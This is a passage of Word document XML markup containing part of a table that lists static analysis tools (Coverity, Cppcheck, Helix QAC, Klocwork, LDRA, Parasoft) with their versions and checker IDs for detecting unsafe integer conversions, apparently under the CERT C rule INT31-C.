              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D572B94" w14:textId="5928AB9C" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Can detect violations of this rule. However, false warnings may be raised if </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>limits.h</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> is included</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D01F68" w14:paraId="7B57D6C5" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0880DBB9" w14:textId="084C7756" w:rsidR="00D01F68" w:rsidRDefault="00000000" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId23" w:history="1">
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Coverity</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00D01F68">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="527A0ABE" w14:textId="788AD4C9" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2017.07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01122C38" w14:textId="77777777" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">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NEGATIVE_RETURNS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="313703F0" w14:textId="77777777" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">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REVERSE_NEGATIVE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EFB0041" w14:textId="269ECC62" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>MISRA_CAST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35138170" w14:textId="77777777"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Can find array accesses, loop bounds, and other expressions that may contain dangerous implied integer conversions that would result in unexpected behavior</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48597FDD" w14:textId="77777777" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">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Can find instances where a negativity check occurs after the negative value has been used for something else</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E45804C" w14:textId="2C8B1F22" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Can find instances where an integer expression is implicitly converted to a narrower integer type, where the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>signedness</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> of an integer value is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>implicitly converted, or where the type of a complex expression is implicitly converted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D01F68" w14:paraId="42339D35" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46DA9BD3" w14:textId="7036356A" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText>HYPERLINK "https://wiki.sei.cmu.edu/confluence/display/c/Cppcheck"</w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="0052CC"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Cppcheck</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="0052CC"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B98C611" w14:textId="6AAC0A15" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1.66</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EF360E7" w14:textId="650BBB17" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>memsetValueOutOfRange</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19D958E2" w14:textId="0E155E0A"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The second argument to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>memset</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> cannot be represented as </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>unsigned char</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D01F68" w14:paraId="2F5B7C82" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5122E28E" w14:textId="64C562B3" w:rsidR="00D01F68" w:rsidRDefault="00000000" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId24" w:history="1">
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Helix QAC</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="425A356E" w14:textId="0368484B" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F6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2024.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52AA21DD" w14:textId="77777777" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">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C2850, C2855, C2890, C2895, C2900, C2905,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63E1F319" w14:textId="77777777" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">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C++2850, C++2855, C++2890, C++2895, C++2900, C++</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2905,  C</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>++3000, C++3010</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E3801C9" w14:textId="77777777" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="150" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="19C0A09E" w14:textId="75A977F3" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>DF2851, DF2852, DF</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2853,  DF</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2856, DF2857, DF2858, DF2891, DF2892, DF2893, DF2896, DF2897, DF2898, DF2901, DF2902, DF2903, DF2906, DF2907, DF2908</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DDE9735" w14:textId="77777777" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D01F68" w14:paraId="78658550" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4798DD42" w14:textId="016B8FE8" w:rsidR="00D01F68" w:rsidRDefault="00000000" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId25" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Klocwork</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E6D1281" w14:textId="167C56AE" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F6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2024.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="496BBD6C" w14:textId="3B1608CF" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>PORTING.CAST.SIZE</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="454EBAEA" w14:textId="77777777" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D01F68" w14:paraId="09CE2C06" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63C4602A" w14:textId="575CC9FF" w:rsidR="00D01F68" w:rsidRDefault="00000000" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId26" w:history="1">
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>LDRA tool suite</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FAA1C65" w14:textId="1DBE273C" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F6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9.7.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C105989" w14:textId="22F3FC58" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>93 S, 433 S, 434 S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A47A693" w14:textId="052483C1"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tc>
      </w:tr>
      <w:tr w:rsidR="00D01F68" w14:paraId="33882F84" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="559381B2" w14:textId="64DF3709" w:rsidR="00D01F68" w:rsidRDefault="00000000" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId27" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Parasoft</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> C/C++test</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16E37916" w14:textId="624F4FC0" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F6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2023.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FA8F84A" w14:textId="17B35FC7" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-INT31-a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
